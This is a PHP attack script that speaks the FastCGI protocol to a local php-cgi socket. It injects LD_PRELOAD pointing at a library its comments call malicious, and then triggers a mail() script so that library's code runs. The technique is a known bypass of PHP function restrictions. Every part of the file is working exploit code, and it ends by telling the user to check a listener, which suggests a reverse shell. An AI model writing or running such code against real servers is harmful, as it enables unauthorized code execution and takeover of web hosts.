📖 File Reader
<?php
// FastCGI client with LD_PRELOAD for mail() exploitation
$socketFile = '/tmp/php-cgi-73.sock';
$scriptFile = '/tmp/trigger.php'; // our mail() script
// FastCGI protocol constants
define('FCGI_BEGIN_REQUEST', 1);
define('FCGI_PARAMS', 4);
define('FCGI_STDIN', 5);
define('FCGI_RESPONDER', 1);
function fcgi_packet($type, $content, $requestId = 1) {
$version = 1;
$paddingLength = (8 - (strlen($content) % 8)) % 8;
$packet = pack('CCnn', $version, $type, $requestId, strlen($content));
$packet .= $content;
$packet .= str_repeat("\0", $paddingLength);
return $packet;
}
$socket = stream_socket_client('unix://' . $socketFile, $errno, $errstr, 30);
if (!$socket) die("Socket connection failed: $errstr\n");
$requestId = 1;
// Begin request
$content = pack('nC5', FCGI_RESPONDER, 0, 0, 0, 0, 0);
fwrite($socket, fcgi_packet(FCGI_BEGIN_REQUEST, $content, $requestId));
// Environment variables – CRITICAL: add LD_PRELOAD
$params = [
'SCRIPT_FILENAME' => $scriptFile,
'REQUEST_METHOD' => 'GET',
'QUERY_STRING' => '',
'CONTENT_TYPE' => '',
'CONTENT_LENGTH' => '0',
'SCRIPT_NAME' => '/trigger.php',
'REQUEST_URI' => '/trigger.php',
'DOCUMENT_ROOT' => '/',
'LD_PRELOAD' => '/tmp/evil.so', // our malicious library
// Additional required variables
'SERVER_SOFTWARE' => 'PHP FastCGI Client',
'GATEWAY_INTERFACE' => 'CGI/1.1',
];
$paramContent = '';
foreach ($params as $name => $value) {
$nameLen = strlen($name);
$valueLen = strlen($value);
$paramContent .= pack('C', $nameLen) . pack('C', $valueLen) . $name . $value;
}
fwrite($socket, fcgi_packet(FCGI_PARAMS, $paramContent, $requestId));
fwrite($socket, fcgi_packet(FCGI_PARAMS, '', $requestId)); // end of params
// Empty STDIN (no POST)
fwrite($socket, fcgi_packet(FCGI_STDIN, '', $requestId));
// Read and discard response (optional)
while (!feof($socket)) {
$header = fread($socket, 8);
if (strlen($header) < 8) break;
$data = unpack('Cversion/Ctype/nrequestId/ncontentLength/CpaddingLength/Creserved', $header);
fread($socket, $data['contentLength']);
fread($socket, $data['paddingLength']);
if ($data['type'] == 3) break; // FCGI_END_REQUEST
}
fclose($socket);
echo "Request sent. Check your listener!\n";
?>